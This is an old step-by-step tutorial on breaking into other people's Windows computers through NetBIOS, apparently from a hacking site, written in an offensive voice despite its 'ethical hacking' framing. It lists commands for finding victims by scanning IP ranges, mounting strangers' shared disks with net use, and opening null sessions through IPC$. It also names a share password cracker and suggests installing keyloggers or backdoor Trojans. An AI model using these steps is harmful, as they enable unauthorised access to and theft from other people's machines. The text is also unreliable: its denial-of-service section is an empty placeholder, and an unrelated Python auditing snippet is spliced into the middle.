
NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR

ethicalhackers@yahoo.com
Note- This tutorial may bear a resemblance to tutorials written by other authors. I have acknowledged the
tutorials or articles that I referred to before writing this tutorial. It is possible that there may be other
tutorials that I have not referred to and that are similar to my tutorial. It is not possible for me to give
acknowledgment to such tutorials and hence there must be no copyright or legal issues regarding this
tutorial.
Preface
Dear reader, I have written this tutorial keeping in mind that readers having only basic knowledge will also be able
to know how hackers hack using NetBIOS. Using NetBIOS for hacking is probably the easiest way to hack
remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks
not for anti social reasons but to let the network administrators know about the security holes so that they can protect
their computers from being hacked. If you want to contact me please send me a mail to ethicalhackers@yahoo.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack ?
Types of attacks
Searching for a victim
Lets Hack - Part 1 Remotely reading/writing to a victim's computer
Cracking "Share" passwords
Using IPC$ to hack Windows NT
Penetrating in to the victim's computer
Lets Hack - Part 2 Denial of service attack
How to protect yourself
____________________________________________________________
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an
Application Programming Interface (API) for client software to access LAN resources. If you have experience of
working on a LAN using Microsoft Windows Operating Systems (like Windows 98, Windows Me, Windows NT etc),
you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking
on the icon you would have seen the names of the computers. Do you know what exactly happens when you click on
Network Neighborhood? Your computer tries to get the names of the computers attached to the network by
issuing a command to NetBIOS. NetBIOS gives the names of the computers that have been registered. In short
NetBIOS gives various information about the computers on a network. These include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port. It has been assigned a port number 139.
____________________________________________________________
THE NBTSTAT COMMAND
You can manually interact with NetBIOS with the help of the NBTSTAT command. To use this command click on the
start button then select RUN... and type "command" without quotes to launch the MS-DOS Command Prompt.
Alternatively you may click on the Start Button then go to Programs and then select Command Prompt. Once you are in
Command Prompt you can exit by typing the command EXIT. To launch Command Prompt in full screen mode press the
ALT+ENTER key combination. To get back to the original window press the ALT+ENTER key combination again. If you
have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry, just keep going, all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name            Number  Type  Usage
--------------------------------------------------
workgroup       00      G     Domain Name
my_computer     03      U     Messenger Service
myusername      03      U     Messenger Service
MAC Address = 00-02-44-14-22-E5

Please note that we have used our ip address to be 127.0.0.1. This ip address is called the "Loop Back" ip address
because it always refers to the computer you are using.
This example is self explanatory. We need not go into details. We need to know about the Name and Number. The
Name displays the NetBIOS name and there is a corresponding hexadecimal number. You may see some
additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command
NOTE- 203.195.136.156 may be an active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
____________________________________________________________
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and
an internet connection.
____________________________________________________________

TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
____________________________________________________________
Searching for a victim
You may manually search for the victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If at first
you don't succeed step to the next ip address until you find a suitable ip address. You may also use a port scanner. A port
scanner is simply a software that can search any block of ip addresses, say 192.168.0.1 to 192.168.0.255, for one or
more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
____________________________________________________________
Lets Hack - Part 1 Remotely reading/writing to a victim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition
that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer
Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now
let us take an example. Suppose you know an ip address that has enabled File And Printer Sharing and let us suppose the
ip address happens to be 203.195.136.156.
If you don't know the ip address where File and Printer Sharing
is enabled read "Searching for a victim"
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let us suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name            Type         Status
--------------------------------------------------
user      <00>  UNIQUE       Registered
workgroup <00>  GROUP        Registered
user      <03>  UNIQUE       Registered
user      <20>  UNIQUE       Registered
MAC Address = 00-02-44-14-22-E5

The number <20> shows that the victim has enabled File And Printer Sharing.
------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20>. This shows that the victim has not enabled File And Printer Sharing.
2. You get "Host Not found". This shows that the port 139 is closed or the ip address doesn't exist.
------------------------------------------------------------
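An added example, not part of the original tutorial: for an administrator auditing their own machines, the Python code below parses saved nbtstat -a output in the layout shown above and reports whether the <20> name is registered, covering both possibilities in the NOTE. The sample outputs and the host name LABPC01 are constructed, and parse_name_table and audit are names introduced here.

```python
import re

# Suffix codes shown in the tables above (hex value -> service).
SUFFIXES = {0x00: "workstation/domain name",
            0x03: "Messenger Service",
            0x20: "File and Printer Sharing (file server service)"}

# One row of the name table: name, <hex suffix>, UNIQUE|GROUP, status.
ROW = re.compile(r"^\s*(\S+)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")

def parse_name_table(text):
    """Return one dict per NetBIOS name row found in nbtstat -a output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            code = int(suffix, 16)
            rows.append({"name": name, "suffix": code, "type": kind,
                         "status": status,
                         "service": SUFFIXES.get(code, "other")})
    return rows

def audit(text):
    """Classify one host: 'unreachable', 'sharing-enabled' or 'no-sharing'."""
    if "host not found" in text.lower():
        return "unreachable"          # possibility 2 in the NOTE
    exposed = any(r["suffix"] == 0x20 and r["status"].lower() == "registered"
                  for r in parse_name_table(text))
    return "sharing-enabled" if exposed else "no-sharing"

# Constructed sample outputs (the host name and MAC are made up).
SHARING = """\
       NetBIOS Remote Machine Name Table
   Name               Type         Status
---------------------------------------------
LABPC01        <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
LABPC01        <03>  UNIQUE      Registered
LABPC01        <20>  UNIQUE      Registered
MAC Address = 00-00-00-00-00-00
"""
NO_SHARING = "\n".join(l for l in SHARING.splitlines() if "<20>" not in l)
NOT_FOUND = "Host not found.\n"

if __name__ == "__main__":
    for label, out in [("sharing", SHARING), ("none", NO_SHARING), ("down", NOT_FOUND)]:
        print(label, "->", audit(out))
```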
Now our next step would be to view the drives or folders the victim is sharing.
We will use the command
c:\windows>net view \\203.195.136.156
Let us suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name   Type   Used as   Comment
--------------------------------------------------
CDISK        Disk

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named CDISK. You may also get some additional information like

Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name   Type   Used as   Comment
--------------------------------------------------
HP-6L        Print

"Print" shows that the victim is sharing a printer named HP-6L
If we are able to share the victim's hard disks or folders or printers we will be able to read and write to the folders or hard
disks, or we may also be able to print anything on a remote printer! Now let us share the victim's computer's hard disk
or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer
File and Printer Sharing is enabled and the victim's hard disk's name is CDISK.
Now we will connect our computer to that hard disk. After we have connected successfully a drive will be created on
our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our
newly formed drive to the victim's share name CDISK it means that our drive will have the same contents as that of
the CDISK.
Lets do it.
We will use the NET command to do our work.
Let us suppose we want to make a drive k: on our computer and connect it to the victim's share. We will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace the letter k by any other letter.
If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just created a new drive k:. Just double click on it and you will find that you are able to access the remote
computer's hard disk. Enjoy your first hack!
____________________________________________________________
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password
cracker "PQWAK". All you have to do is enter the ip address and the share name and it will decrypt the password within
seconds. Please note that this can crack the passwords only if the remote operating system is running on -
Windows 95
Windows 98
Windows Me
____________________________________________________________
Using IPC$ to hack Windows NT
Now you must be thinking of something that can crack share passwords on NT based operating systems like
Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker. It is simply a string that tells the remote operating system
to give guest access, that is, give access without asking for a password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace the letter k by any other letter. If you replace it by "b" (type without quotes) a new drive will be created with
the drive letter b.
Please note that you won't be able to get access to the victim's shared drives but you can gather valuable information
like names of all the usernames, users that have never logged in, and other such information. One such tool that uses
the ipc$ method is "Internet Periscope"
____________________________________________________________

Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his
mp3 songs, and more...
But if you think like a hard core hacker you would like to play some dirty tricks, like you may wish to install a key logger
or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involve
writing to the victim's hard disk. For this you need to have write access permission and this can only be granted by the
remote user.
____________________________________________________________
Lets Hack - Part 2 Denial of service attack

This type of attack is meant to be launched by computer techies because it involves using the
Linux Operating System and compiling C language files.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1
Vulnerability 2
____________________________________________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let Windows update itself.
____________________________________________________________
The above tutorial has been written by Gaurav Kumar
If you need more help please feel free to email me at ethicalhackers@yahoo.com
END OF TUTORIAL